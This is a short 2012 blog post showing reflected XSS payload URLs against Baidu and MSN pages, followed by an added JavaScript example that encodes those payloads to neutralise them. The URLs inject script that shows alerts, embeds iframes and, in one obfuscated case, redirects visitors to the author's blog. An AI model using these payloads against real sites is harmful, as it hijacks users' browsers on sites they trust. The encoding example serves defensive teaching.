
Cross-site scripting flaws in Baidu and MSN

Sony st2tea.blogspot.com


...in baidu.com

https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script>

...in .msn 


http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 >


http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss


http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script>


...simple 
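
Each URL above is a reflected XSS: a query-parameter value is echoed into the response without encoding for the context it lands in. The following is an added example, not part of the original post, showing output encoding applied to the parameter values from the MSN URLs; the function names and the two sink contexts (a quoted HTML attribute or element text, and a string inside an inline script block) are assumptions, since the post does not show the vulnerable page source.

```javascript
// Added example: context-aware output encoding. Sink contexts are assumed.

// Query-parameter values copied from the MSN URLs in the post.
const samples = [
  `"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 >`,
  `'-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>`,
  `2"/><script>alert('XSS by flexxpoint and Sony')</script>`,
];

const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};

// For element text and quoted attribute values: quotes can no longer close
// the attribute, and angle brackets can no longer open or close a tag.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// For a string literal inside an inline <script> block. JSON.stringify
// escapes quotes and backslashes; the extra \uXXXX escapes keep "</script>"
// and "-->" out of the markup, so the HTML parser never sees them.
function encodeJsString(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Encode every sample for both contexts and confirm the script-context form
// still decodes to the exact original value (data preserved, markup inert).
function report(values) {
  return values.map((v) => ({
    html: encodeHtml(v),
    js: encodeJsString(v),
    roundTrips: JSON.parse(encodeJsString(v)) === v,
  }));
}

console.log(report(samples));
```

The two encoders are not interchangeable: HTML entity encoding does not protect a value written into a script block, and the script-string form is not valid inside an attribute.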


21 March 2012
